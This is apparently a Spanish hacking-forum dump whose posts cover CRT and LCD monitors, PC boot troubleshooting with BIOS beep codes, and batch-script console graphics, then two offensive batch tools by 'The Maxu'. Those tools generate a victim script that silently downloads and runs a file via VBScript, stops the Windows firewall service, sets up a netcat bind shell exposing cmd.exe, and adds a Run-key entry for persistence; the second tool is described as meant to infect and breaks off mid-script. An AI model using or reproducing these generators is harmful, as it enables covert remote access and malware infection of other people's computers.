Un CRT es escencialmente una botella de vidrios sellada, sin aire adentro. Comienza con un cuello fino que se agranda hacia la base. Esta base es la pantalla del monitor, y esta recubierta del lado de adentro con una matriz de miles de pequeños puntos de fosforo. El fósforo es un elemento químico que emite luz cuando es exitado por un rayo de electrones. Cada punto consiste en 3 gotas de fósforo coloreado: Azul, Verde y Rojo.

En el cuello de la botella del CRT se encuentra lo que se denomina cañón de electrones, compuesto con un cátodo (fuente de calor) y elementos de enfoque. Combinaciones de diferentes intensidades de Rojo, verde y azul pueden crear la ilusión de millones de colores. Esto es lo que se conoce como color aditivo.

Las imagenes se forman cuando los electrones, disparados por el cañón, convergan a sus respectivas gotas y cada una es iluminada, en mayor o menor intensidad. Cuando esto ocurre la luz es emitida, en el color de las gotas de fósforo. Los fósforos en un grupo están tan cerca unos de otros que el ojo percibe la combinación como un único pixel coloreado. Y la combinación de pixeles forma la imágen en general.


Los Monitores LCD: Composición y funcionamiento





El funcionamiento de estas pantallas se fundamenta en la utilización de sustancias que comparten propiedades de sólidos y líquidos a la vez. Cuando un rayo de luz atraviesa una partícula de estas sustancias tiene necesariamente que seguir el espacio vacío que hay entre sus moléculas -como lo haría al atravesar un cristal sólido- pero a cada una de estas partículas se le puede aplicar una corriente eléctrica que cambie su polarización dejando pasar la luz o no. Una pantalla LCD está formada por dos filtros polarizados colocados perpendicularmente entre sí de maner que al aplicar una corriente eléctrica al segundo de ellos dejaremos pasar o no la luz que ha atravesado el primero de ellos. Para conseguir el color es necesario aplicar tres filtros más para cada uno de los colores básicos -rojo, verde y azul- y para la reproducción de varias tonalidades de color, se deben aplicar diferentes niveles de brillo intermedios entre luz y no-luz, lo cual se consigue con variaciones en el voltaje que se aplica a los filtros.
Las ventajas de este tipo de pantallas son su menor tamaño, el bajo consumo -por eso se utilizan en los portátiles- y la desaparición de los problemas de parpadeo y geometría de las pantallas normales tubo de rayos catódicos.

Las desventajas son su coste sensiblemente superior a los monitores convencionales, el menor ángulo de visión -hay que mirarlas de frente-, la menor velocidad de refresco y la pérdida en la gama de colores por lo que no son aptas para trabajos de diseño gráfico.



Autor: neucoas (Taringa.net)

Modificado por: Stiuvert
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#2626
¿QUE HAY QUE COMPROBAR CUANDO UNA PC NO ARRANCA?

Sé que a algunos nos les gusta leer pero amigos de iv si tenes algun fallo en tu pc seria bueno que leas este tuto sencillo pero practico y nos puede llegar a evitar algun dolor de cabeza sin mas empiezo.


Cuando nuestro ordenador no arranca hay una serie de comprobaciones básicas que debemos hacer, ya que puede tratarse de una tontería fácil de solucionar.




En primer lugar, a efectos de este tutorial, vamos a definir no arranca:

No arranca es cuando el ordenador no hace nada, es decir, no aparece nada en pantalla ni emite ningún pitido.

Si el ordenador arranca, nos muestra las pantallas de la BIOS y lo que falla es al cargar el sistema, no estamos ante un fallo físico del ordenador, sino ante un fallo de software (aunque en algunas ocasiones puede tratarse de un fallo de un elemento concreto, normalmente la gráfica, fallo en el disco duro o una memoria en mal estado), pero esto suele producir la mayoría de las veces el típico pantallazo azul.

Si al encenderlo suena uno o dos pitidos cortos se trata de los pitidos de comprobación del POST de la BIOS, y si el problema es que no sale ninguna imagen en el monitor debemos hacer las comprobaciones de rigor, es decir, ver si el monitor recibe corriente (si está encendido el led de Power del monitor) y si está bien conectado al equipo.


Una vez visto esto, vamos a ver los síntomas que muestra el ordenador.
Lo primero que hay que ver es si funcionan los ventiladores y si se enciende alguna luz o hace algún ruido.


Si no hace nada de esto lo primero que hay que mirar es la fuente de alimentación, ya que aunque el ordenador no funcione la fuente sí que debería conectarse.


Las comprobaciones que hay que hacer son:

Mirar que esté bien enchufada a la toma de corriente, asegurándonos de que en ese enchufe hay tensión.

Si tiene un interruptor, mirar que éste esté en la posición correcta.

Hechas estas comprobaciones, lo mejor es probar con otra fuente (que
sepamos seguro que funciona).




Si funciona, ya tenemos solucionado el problema.


Si no funciona, procedemos de la siguiente forma:

En primer lugar, y para descartar un fallo en el botón de encendido (aunque esto es muy raro), quitamos el cable de dicho botón (Pwr_Sw) y cortocircuitamos los pines correspondientes con un destornillador.





Arranca, sólo se trata de solucionar el problema, bien reemplazando o reparando ese botón o bien, si nuestra torre cuenta con un botón de Reset, utilizando éste para encender (cambiardo la conexión de dicho botón de Reset a Pwr_Sw).


Descartado ya que se trate de un problema con el botón de encendido, continuamos con nuestras comprobaciones:

En placas con diodo de testigo de carga, si este diodo no se enciende es que la placa base ha muerto y ni tan siquiera activa la fuente.

Si se trata de una placa sin diodo y la fuente sí que se activa o o el diodo se enciende procedemos como se indica a continuación:

Nos aseguramos de que está conectado el altavoz del sistema (al conector Speak de la placa base). Una vez hecho esto, desconectamos todos los elementos conectados a la placa base, es decir, memorias, tarjeta gráfica (si no es integrada), discos duros, disqueteras, unidades de DVD y todo lo que tengamos. Una vez hecho esto volvemos a darle al botón de Power.


Nos podemos encontrar con dos posibilidades:


Sigue sin arrancar:

Si hecho esto (y sabemos que la fuente funciona) sigue sin hacer nada, la placa base está rota.

La fuente se activa, el ordenador da señales de recibir corriente, pero sigue sin funcionar:

Pero nos podemos encontrar con que la fuente se activa, los ventiladores funcionan, las unidades ópticas se abren y el disco dura da signos de actividad (lo escuchamos girar), pero a pesar de ello el ordenador no arranca.


En ese caso vamos a tratar de averiguar cual es el problema. Hay que decir que estas comprobaciones requieren en muchos casos tener material de repuesto, por lo que vamos a indicar el momento en el que ya es preferible llevar el ordenador a un SAT(servicio tecnico), porque evidentemente lo que no podemos es invertir en una serie de elementos sin saber si están en buen estado o no.


Bien, vamos a ver los pasos a seguir:

En primer lugar desconectamos la Pc y el monitor y descargamos la electricidad estática que pudiéramos tener acumulada. Para ello basta con que toquemos un grifo metálico.

En primer lugar abrimos el ordenador y comprobamos qué es lo que funciona (ventiladores, diodos...).


Lo siguiente es hacer una comprobación visual de la placa base en busca de elementos que a simple vista se noten estropeados.



El elemento que más suele fallar son los condensadores.
Un claro síntoma de fallo de éstos es que estén hinchados o se vea fuga de líquido y manchas en su exterior.



Si vemos condensadores en mal estado casi seguro que hemos encontrado la raíz del problema. Poco queda en ese caso que hacer,
y la solución que nos queda es cambiar la placa base. En algunas ocasiones los condensadores estropeados se pueden reemplazar por unos nuevos, pero por un lado esto no siempre funciona y por otro los condensadores deben ser exactamente iguales a los estropeados. Cuando se trata de sustituir condensadores en una placa base la tolerancia es prácticamente nula.



No obstante, si queremos estar seguros podemos continuar con las comprobaciones que a continuación se indican, pero desde luego esa placa base está mal y debe ser reemplazada.

Bien, si no encontramos nada anormal, continuamos con las comprobaciones en busca del elemento que nos está ocasionando el que el ordenador no arranque.


La mayoría de las veces el fallo está en la gráfica o en las memorias. Para comprobar esto, quitamos ambas cosas y volvemos a intentar encender el ordenador.



Los ordenadores emiten una serie de pitidos cuando detectan una serie de fallos, y es por esos pitidos por los que nos debemos guiar. A continuación vemos una lista con los principales pitidos y su significado, dependiendo de la BIOS que monte nuestro ordenador:


Para BIOS AWARD:

1 pitido corto: Test de la BIOS correcto.

1 Pitido Largo: problema de memoria
1 Pitido Largo, y 2 Pitidos cortos: Error de Vídeo (Tarjeta gráfica)

1 Pitido Largo, y 3 Pitidos cortos: Error de Vídeo (Tarjeta gráfica)
Pitidos Continuos: Problema de memoria o Vídeo







Para BIOS AMI:


1 Pitido: Fallo en el refresco de la memoria DRAM
2 Pitidos: Fallo del circuito de paridad

3 Pitidos: Fallo en los primeros 64KB de memoria RAM
4 Pitidos: Fallo del sistema de temporización

5 Pitidos: Fallo del procesador
6 Pitidos: Fallo del controlador de teclado en la puerta A20

7 Pitidos: Error de excepción del modo Virtual
8 Pitidos: Fallo de lectura/escritura de la memoria de pantalla
9 Pitidos: Fallo de suma de control de la ROM BIOS

10 Pitidos: Error lectura/escritura en el registro de cierre de CMOS
11 Pitidos: Error de la memoria Cache

1 Pitido Largo, 3 Cortos: Fallo de Memoria Convencional/Extendida
1 Pitido Largo, 8 Cortos: Fallo del test de pantalla. Pitidos continuos:



Seguramente problema de memoria o vídeo



Para BIOS IBM:


No Pita:
No hay corriente, tarjeta floja, o cortocircuito.
1 Pitido Corto: Arranque normal. El equipo está bien.

2 Pitidos Cortos: Error POST. Ver pantalla para código de error.
Pitidos Continuos: No hay corriente, Tarjeta floja, o cortocircuito.

Pitidos Cortos Repetitivos: No hay corriente, Tarjeta floja, o cortocircuito.
1 Pitido largo y uno corto: Problema en la placa base.
1 Pitido largo y dos cortos: Problema Vídeo (Circuitería Pantalla Mono/CGA).

1 Pitido largo y tres cortos: Problema en circuito de pantalla EGA.

3 pitidos largos: Error en el teclado o en el controlador.
1 Pitido y Pantalla negra o imagen incorrecta: Falla Circuitería de Vídeo.

Si con la gráfica y la memoria quitada el ordenador pita ya tenemos localizados los elementos que fallan.










Ahora solo nos queda averiguar cual es exactamente. lo primero que debemos hacer, ya que tenemos quitada tanto la gráfica como las memorias, es limpiar bien los contactos. Para ello, primero los limpiamos con una goma de borrar. A continuación les pasamos un trapo mojado en alcohol (y mojado NO es empapado) y por último las secamos perfectamente, asegurándonos de que no quedan rastros de humedad.

Para ello apagamos, ponemos la gráfica y volvemos a encender. En este caso el ordenador debe emitir una serie de pitidos señalando que le falta la memoria.

Si esto es así, en el caso de tener más de un módulo de memoria los ponemos uno a uno, intentando arrancar hasta localizar la avería.
En definitiva, se trata de probar combinaciones para detectar el elemento estropeado.

Pero si aun con la gráfica y las memorias quitadas no emite ningún pitido (lo cual es mala señal), seguimos probando. Desconectamos las unidades IDE y SATA que tengamos y volvemos a encender. Si sigue sin pitar, lo siguiente es quitar el procesador.



Esto sí que es definitivo. Si al quitar el procesador sigue sin emitir ningún pitido, la placa base ha muerto, ya que al conectarla sin el procesador debe empezar a emitir pitidos cortos y continuos de forma bastante molesta.

Si una vez puesta la gráfica y una de las memorias el ordenador arranca tenemos solucionado el problema. Si no, es cuestión de comprobar los demás módulos, uno a uno, hasta localizar el que está fallando.

Comprobadas las memorias, si todo sigue correcto continuamos conectando los elementos que hemos desconectado uno a uno, hasta localizar cual es el que ha provocado el fallo.

Hay que advertir que es muy posible que el fallo estuviera en la sociedad de los contactos o bien de la tarjeta gráfica o bien de las memorias, por lo que al limpiarlas y volverlas a poner correctamente nuestro ordenador funcione.

También pudiera tratarse de un fallo en el procesador, pero esto, aunque no es del todo descartable, sí que es bastante raro, sobre todo con procesadores actuales, ya que llevan bastantes sistemas de protección para evitar que se quemen.

Existe una posibilidad de que la placa esté haciendo un contacto con el chasis de la caja y no arranque por ese motivo, pero esto se suele pasar (aunque muy rara vez) en ordenadores recién montados (es decir, que no han funcionado nunca).



Para ver si se trata de ésto, la opción es desmontar la placa base y probarla fuera de la caja.





Bien, estas son las comprobaciones que puede hacer el usuario.

Casi todas son a base de cambiar piezas y probar, por lo que si no disponemos de éstas, lo más razonable es llevar el equipo a un SAT, ya que no es cuestión de comprar una gráfica o memorias sin saber exactamente cual es la que está mal. Y menos aún en el caso de una placa base o procesador.

sin mas que decir espero sus comentarios




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Aca les dejo una laminas con todos los conectores de una pc muy util por sierto, yo la uso






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#2627



Este cuaderno se ha realizado como apoyo al conocimiento fundamental en la programación de páginas dinámicas y está enfocado al aprendizaje básico del lenguaje PHP y del manejador de bases de datos MySQL. Para comenzar a diseñar sitios web, debemos primero considerar la plataforma que necesitamos el servidor de desarrollo. Lo anterior implica decidir que Sistema Operativo utilizar (Unix, Linux, Windows, etc.) también debemos saber que tipo de servidor de internet queremos instalar. Podemos instalar PSW, IIS o Apache...
   


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#2628
Python / Guía de aprendizaje de Python
Abril 25, 2011, 06:07:53 PM
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Saludos
#2629
Para este tema tomaremos como base la explicacion del Plano Cartesiano y el significado de Coordenadas:

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Luego lo que quiero llegar a representar con esto es el Cuadrante IV del Sistema de Coordenadas Plano, en el cual se especifican pares de coordenadas para los ejes X & Y de la forma X=0 y Y=0. (X0Y0)

Como tomamos como base el cuadrante IV las coordenadas que demos seran dibujadas de la siguiente forma:

Ej: X1Y0,X5Y6

   0  1  2  3  4  5  6  7  8  9  10
 .---------------------------------------------->
1 |    X
2 |  
3 |
4 |
5 |
6 |                  X
7 |
 \/

Ahora, el objetivo es que mediante coordenadas podamos realizar dibujos en la consola, un script en el cual se definen las dimensiones de los dos ejes y luego se pasan las coordenadas que tomaran valor, para formar cualquier figura.

Graphical:
Código: text

@echo off
@::Graphical Maths
@::Coded by SmartGenius

if ["%1"]==[""] Echo Parametros Insuficientes!&Goto :Eof
if ["%2"]==[""] Echo Parametros Insuficientes!&Goto :Eof
if ["%~3"]==[""] Echo No ha Establecido Coordenadas!&Goto :Eof

:load
setlocal enabledelayedexpansion
set /a LimX=%1
set /a LimY=%2

:init
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set X%%aY%%b=?))
for %%c in (%~3) do (set %%c=?)
Goto :Graphic

:Graphic
for /l %%d in (0,1,%LimY%) do (
for /l %%e in (0,1,%LimX%) do (
set Lin_%%d=!Lin_%%d!!X%%eY%%d!))
echo.
for /l %%f in (0,1,%LimY%) do (echo. !Lin_%%f!)
endlocal
Goto :Eof


La forma de llamar al Script es pasandole tres parametros correspondientes a:

%1 = Longitud del Eje X
%2 = Longitud del Eje Y
"%3" = Pares de Coordenadas, separadas por comas. (todo entre comillas)


Ej: (todo el parametro de coordenadas en una sola linea  por favor ;) )
Código: text

@echo off
call Graphics 22 6 "x1y1,x2y1,x3y1,x5y1,x6y1,x8y1,x9y1,x11y1,x12y1,x13y1,x15y1,x16y1,x17y1,x19y1,x20y1,x21y1,
x1y2,x5y2,x7y2,x9y2,x11y2,x13y2,x15y2,x17y2,x20y2,x1y3,x2y3,x3y3,x5y3,x9y3,x11y3,x12y3,x13y3,x15y3,x16y3,
x20y3,x3y4,x5y4,x9y4,x11y4,x13y4,x15y4,x17y4,x20y4,x1y5,x2y5,x3y5,x5y5,x9y5,x11y5,x13y5,x15y5,x17y5,x20y5"
pause
exit


Con eso llamamos al Script que nos crea un Plano cuyo EjeX sera de 22, el EjeY sera de 6 y Cuyas coordenadas dan como Resultado:



Esto para cuando se trabaja desde la consola, pero tambien desde un codigo .BAT externo puede adaptarse al tama?o del BUFER actual del CMD, el cual es modificado mediante el comando MODE de la forma MODE CON COLS=XX LINES=XX

Código: text

@echo off
@::Graphical Maths
@::Coded by Smart

if ["%1"]==[""] Echo Parametros Insuficientes!&Goto :Eof
if ["%2"]==[""] Echo Parametros Insuficientes!&Goto :Eof
if ["%~3"]==[""] Echo No ha Establecido Coordenadas!&Goto :Eof

:load
setlocal enabledelayedexpansion
for /f "tokens=2" %%x in ('mode ^|find "Col"') do (set /a LimX=%%x-3)
for /f "tokens=2" %%y in ('mode ^|find "nea"') do (set /a LimY=%%y-3)

:init
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set X%%aY%%b=?
))
for %%c in (%~3) do (set %%c=?)
Goto :Graphic

:Graphic
for /l %%d in (0,1,%LimY%) do (
for /l %%e in (0,1,%LimX%) do (
set Lin_%%d=!Lin_%%d!!X%%eY%%d!
))
echo.
for /l %%f in (0,1,%LimY%) do (echo. !Lin_%%f!)
pause >nul
endlocal
Goto :Eof


Las primeras lienas del FOR se encargaran de leer el tama?o de BUFER definido mediante MODE, y adaptar el plano a estas longitudes.

Todo esto tiene gran aplicacion al momento de generar graficos en la Consola del CMD, sin estar definiendo gran cantidad de variables como lo hacia en codigo anteriores mios, sino que las variables se definen dinamicamente y no necesitan tantas lineas de Codigo.

Esto tambien puede ampliarse aun mas, y que el grafico no sea estatico sino que tenga movimeinto, todo esto bajo el limite de su imaginacion.

Ej:
Código: text

@echo off
@mode con cols=20 lines=18
@::Graphical Maths
@::by Smart

if not exist "keyboard.exe" (Goto :NoKey)

:load
setlocal enabledelayedexpansion
for /f "tokens=2" %%x in ('mode ^|find "Col"') do (set /a LimX=%%x-3)
for /f "tokens=2" %%y in ('mode ^|find "nea"') do (set /a LimY=%%y-3)
set IniX=0
set IniY=0
set MovX=0
set MovY=0

:init
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set X%%aY%%b=?
))
set X0Y0=?
set Curpos=X0Y0
Goto :First

:Graphic
Call :Clear
:First
for /l %%d in (0,1,%LimY%) do (
for /l %%e in (0,1,%LimX%) do (
set Lin_%%d=!Lin_%%d!!X%%eY%%d!
))
echo.
for /l %%f in (0,1,%LimY%) do (echo. !Lin_%%f!)
keyboard
if "%errorlevel%"=="77" (call :MovX+ "%CurPos%")
if "%errorlevel%"=="75" (call :MovX- "%CurPos%")
if "%errorlevel%"=="80" (call :MovY+ "%CurPos%")
if "%errorlevel%"=="72" (call :MovY- "%CurPos%")
if "%errorlevel%"=="88" (pause&exit)
if "%errorlevel%"=="120" (pause&exit)
Goto :Graphic

::Movimiento Lateral a la Derecha
:MovX+
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%p"=="%LimX%" Goto :Eof
set %~1=?
set /a MovX=%%p+1
set X!MovX!Y%%q=?
set CurPos=X!MovX!Y%%q
)
Goto :Eof

::Movimiento Lateral a la Izquierda
:MovX-
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%p"=="%IniX%" Goto :Eof
set %~1=?
set /a MovX=%%p-1
set X!MovX!Y%%q=?
set CurPos=X!MovX!Y%%q
)
Goto :Eof

::Movimiento Vertical hacia Abajo
:MovY+
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%q"=="%LimY%" Goto :Eof
set %~1=?
set /a MovY=%%q+1
set X%%pY!MovY!=?
set CurPos=X%%pY!MovY!
)
Goto :Eof

::Movimiento Vertical hacia Arriba
:MovY-
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%q"=="%IniY%" Goto :Eof
set %~1=?
set /a MovY=%%q-1
set X%%pY!MovY!=?
set CurPos=X%%pY!MovY!
)
Goto :Eof

:Clear
for /l %%m in (0,1,%LimY%) do (set Lin_%%m=)
Goto :Eof

:NoKey
cls
echo.
echo  Uno de los archivos necesarios para el
echo  funcionamiento de este Script no se
echo  encuentra.
echo.
echo  A Continuacion sera creado...
call :keyboard
echo.
echo  Archivo Creado Satisfactoriamente...
echo  Por favor reinicie el Script.
echo.
pause
exit

:keyboard
(
echo n keyboard.dat
echo e 0000 4D 5A 2E 00 01 00 00 00 02 00 00 10 FF FF F0 FF
echo e 0010 FE FF 00 00 00 01 F0 FF 1C 00 00 00 00 00 00 00
echo e 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4 4C CD 21
echo rcx
echo 002E
echo w0
echo q
echo.
)>keyboard.dat
type keyboard.dat|debug>NUL 2>&1
del /f/q/a "keyboard.exe">NUL 2>&1
ren keyboard.dat "keyboard.exe"
Goto :Eof


Para la parte de los Movimientos en los graficos, puede tambien usarse un movimiento diagonal combinando la llamada a dos etiquetas de Movimiento XY...

Ej:

Mover el punto en el Plano, usando el teclado numerico....

1 = Diagonal Abajo Izquierda
2 = Abajo
3 = Diagonal Abajo Derecha
4 = Izquierda
5 = No Mover
6 = Derecha
7 = Diagonal Arriba Izquierda
8 = Arriba
9 = Diagonal Arriba Derecha

Lo cual puede ser usado en el Desarrollo de Juegos (Basicos claro esta) en Batch !!!...

Código: text

@echo off
@mode con cols=20 lines=18
@::Graphical Maths
@::by Smart

if not exist "keyboard.exe" (Goto :NoKey)

:load
setlocal enabledelayedexpansion
for /f "tokens=2" %%x in ('mode ^|find "Col"') do (set /a LimX=%%x-3)
for /f "tokens=2" %%y in ('mode ^|find "nea"') do (set /a LimY=%%y-3)
set IniX=0
set IniY=0
set MovX=0
set MovY=0

:init
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set X%%aY%%b=?
))
set X0Y0=?
set Curpos=X0Y0
Goto :First

:Graphic
Call :Clear
:First
for /l %%d in (0,1,%LimY%) do (
for /l %%e in (0,1,%LimX%) do (
set Lin_%%d=!Lin_%%d!!X%%eY%%d!
))
echo.
for /l %%f in (0,1,%LimY%) do (echo. !Lin_%%f!)
keyboard
if "%errorlevel%"=="49" (call :Diag4 "%CurPos%")
if "%errorlevel%"=="50" (call :MovY+ "%CurPos%")
if "%errorlevel%"=="51" (call :Diag1 "%CurPos%")
if "%errorlevel%"=="52" (call :MovX- "%CurPos%")
if "%errorlevel%"=="53" (Goto :Graphic)
if "%errorlevel%"=="54" (call :MovX+ "%CurPos%")
if "%errorlevel%"=="55" (call :Diag2 "%CurPos%")
if "%errorlevel%"=="56" (call :MovY- "%CurPos%")
if "%errorlevel%"=="57" (call :Diag3 "%CurPos%")
if "%errorlevel%"=="88" (exit)
if "%errorlevel%"=="120" (exit)
Goto :Graphic

::Movimiento Lateral a la Derecha
:MovX+
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%p"=="%LimX%" Goto :Eof
set %~1=?
set /a MovX=%%p+1
set X!MovX!Y%%q=?
set CurPos=X!MovX!Y%%q
)
Goto :Eof

::Movimiento Lateral a la Izquierda
:MovX-
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%p"=="%IniX%" Goto :Eof
set %~1=?
set /a MovX=%%p-1
set X!MovX!Y%%q=?
set CurPos=X!MovX!Y%%q
)
Goto :Eof

::Movimiento Vertical hacia Abajo
:MovY+
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%q"=="%LimY%" Goto :Eof
set %~1=?
set /a MovY=%%q+1
set X%%pY!MovY!=?
set CurPos=X%%pY!MovY!
)
Goto :Eof

::Movimiento Vertical hacia Arriba
:MovY-
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%q"=="%IniY%" Goto :Eof
set %~1=?
set /a MovY=%%q-1
set X%%pY!MovY!=?
set CurPos=X%%pY!MovY!
)
Goto :Eof

::Movimiento Diagonal1
:Diag1
Call :MovX+ "%CurPos%"
Call :MovY+ "%CurPos%"
Goto :Eof

::Movimiento Diagonal2
:Diag2
Call :MovX- "%CurPos%"
Call :MovY- "%CurPos%"
Goto :Eof

::Movimiento Diagonal3
:Diag3
Call :MovX+ "%CurPos%"
Call :MovY- "%CurPos%"
Goto :Eof

::Movimiento Diagonal4
:Diag4
Call :MovX- "%CurPos%"
Call :MovY+ "%CurPos%"
Goto :Eof

:Clear
for /l %%m in (0,1,15) do (set Lin_%%m=)
Goto :Eof

:NoKey
cls
echo.
echo  Uno de los archivos necesarios para el
echo  funcionamiento de este Script no se
echo  encuentra.
echo.
echo  A Continuacion sera creado...
call :keyboard
echo.
echo  Archivo Creado Satisfactoriamente...
echo  Por favor reinicie el Script.
echo.
pause
exit

:keyboard
(
echo n keyboard.dat
echo e 0000 4D 5A 2E 00 01 00 00 00 02 00 00 10 FF FF F0 FF
echo e 0010 FE FF 00 00 00 01 F0 FF 1C 00 00 00 00 00 00 00
echo e 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4 4C CD 21
echo rcx
echo 002E
echo w0
echo q
echo.
)>keyboard.dat
type keyboard.dat|debug>NUL 2>&1
del /f/q/a "keyboard.exe">NUL 2>&1
ren keyboard.dat "keyboard.exe"
Goto :Eof


Y para crear efectos de animaciones, puede hacerse un bucle de coordenadas, en el cual se van definiendo de a una por una y crean un efecto de animacion parecido a los antes descritos en mis codigos...

un Saludo.

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#2630
Batch - Bash / Netcat Virus Creator By The Maxu
Abril 25, 2011, 06:06:41 PM
Código: text
echo off
color 1A
mode con cols=65lines=44
title Mini creador de virus NC by TheMaxu
cls
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º           THE MAXU Mini Creador            º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo Seleciona el nombre para el Virus:
echo.
set /p name=
echo @echo off > C:\%name%.bat
echo.
echo Archivo Creado en C:\ con el nombre: %name%.bat
pause > nul
goto menu

:menu
title Mini creador de virus NC by TheMaxu
cls
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º           THE MAXU Mini Creador            º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo.
echo Utilice el descargador para descargar Nc en el pc de la victima.
echo Utilice Abrir puertos para selecionar el puerto a abrir
echo.
echo.
echo  1.Selecionar las opciones de descarga
echo  2.Descomprimir Zip
echo  3.Abrir puerto de Netcat
echo  4.Informacion
echo  5.Finalizar
echo.
echo.
set /p menup=¿Que desea Hacer?:
if %menup%==1 goto descargador
if %menup%==2 goto zip
if %menup%==3 goto netcat
if %menup%==4 goto info
if %menup%==5 goto finalizar

:descargador
title -Descargador De Archivos
Cls
echo  Escriba la direcion de la descarga
set /p direciondescarga=
echo  Escriba la ruta en la que se guardara(ej: C:\imagen.png o C:\programa.exe)
set /p guardardescarga=
echo  Escriba un nombre para utilizar el vbs
set /p descarga=
echo echo Const adTypeBinary = 1 ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Const adSaveCreateOverWrite = 2 ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Dim BinaryStream ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Set BinaryStream = CreateObject("ADODB.Stream") ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Type = adTypeBinary ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Open ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Function BinaryGetURL(URL) ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Dim Http ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Http.Open "GET", URL, False ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo Http.Send ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo BinaryGetURL = Http.ResponseBody ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo echo End Function ^>^>c:\%descarga%.vbs >> C:\%name%.bat
echo CScript //nologo c:\%descarga%.vbs "%direciondescarga%" "%guardardescarga%" >> C:\%name%.bat
echo Del c:\%descarga%.vbs >> C:\%name%.bat
goto menu

:zip
echo.
echo No disponible temporalmente
echo.
pause >null
goto menu

:netcat
cls
echo Selecione el puerto para NetCat
echo.
echo Luego podra conectarse al pc mendiante
echo netcat en ese puerto.
echo.
set /p puerto=
echo NET STOP "SharedAccess" >> C:\%name%.bat
echo echo @echo off ^>^> C:\netcat.bat >> C:\%name%.bat
echo echo nc -d -L -p %puerto% -e cmd.exe ^>^> C:\netcat.bat >> C:\%name%.bat
echo echo exit ^>^> C:\netcat.bat >> C:\%name%.bat
echo reg add hklm\software\microsoft\windows\currentversion\run /V C:\netcat.bat /D %windir%\system32\netcat.bat>> C:\%name%.bat
echo copy /Y C:\netcat.bat %windir%\system32 >> C:\%name%.bat
echo del C:\netcat.bat >> C:\%name%.bat
cls
echo ok, virus editado.
pause > nul
goto menu

:info
cls
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º           THE MAXU Mini Creador            º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo  Utilize este programa para crear un acceso a una pc
echo  desde netcat, utilize el descargador para que se
echo  descargue netcat o un zip con este(abra que descomprimir)
echo  y luego incluya el codigo para abrir el puerto.
echo.
echo.
echo                               The Maxu
pause >null
goto menu

:finalizar
echo exit >> C:\%name%.bat
exit
#2631
Batch - Bash / Downloader + Launcher
Abril 25, 2011, 06:06:26 PM
Consiste básicamente en descargar un archivo ocultamente para luego ejecutarlo. Pensado mas que nada para infectar...



Código: text
echo off
color 1A
mode con cols=65lines=44
title Downloader Creator Full 0.1v
cls
echo.
echo ***********************************************
echo *****    Downloader Creator Full 0.1v     *****
echo *****         Por The Maxu                *****
echo ***********************************************
echo.
echo.
echo.
echo Primero selecione el nombre del bat a crear:
set /p name=
echo @echo off > C:\%name%.bat
echo.
echo Archivo Creado en C:\ con el nombre: %name%.bat
pause > nul
:main
cls
echo ***********************************************
echo *****    Downloader Creator Full 0.1v     *****
echo *****         Por The Maxu                *****
echo ***********************************************
echo.
echo 1. Descargar archivo en la victima
echo 2. Salir
echo.
set /p opc=Elije una:
if %opc%==1 goto down
if %opc%==2 exit
goto main

:down
cls
echo  Escriba la direcion de la descarga
set /p direciondescarga=
echo  Escriba la ruta en la que se guardara(ej: C:\imagen.png o C:\programa.exe)
set /p guardardescarga=
echo  Escriba un nombre para utilizar el vbs
set /p descarga=
echo echo Const adTypeBinary = 1 ^>^>c:\%descarga%.vbs >> C:\%name%.bat
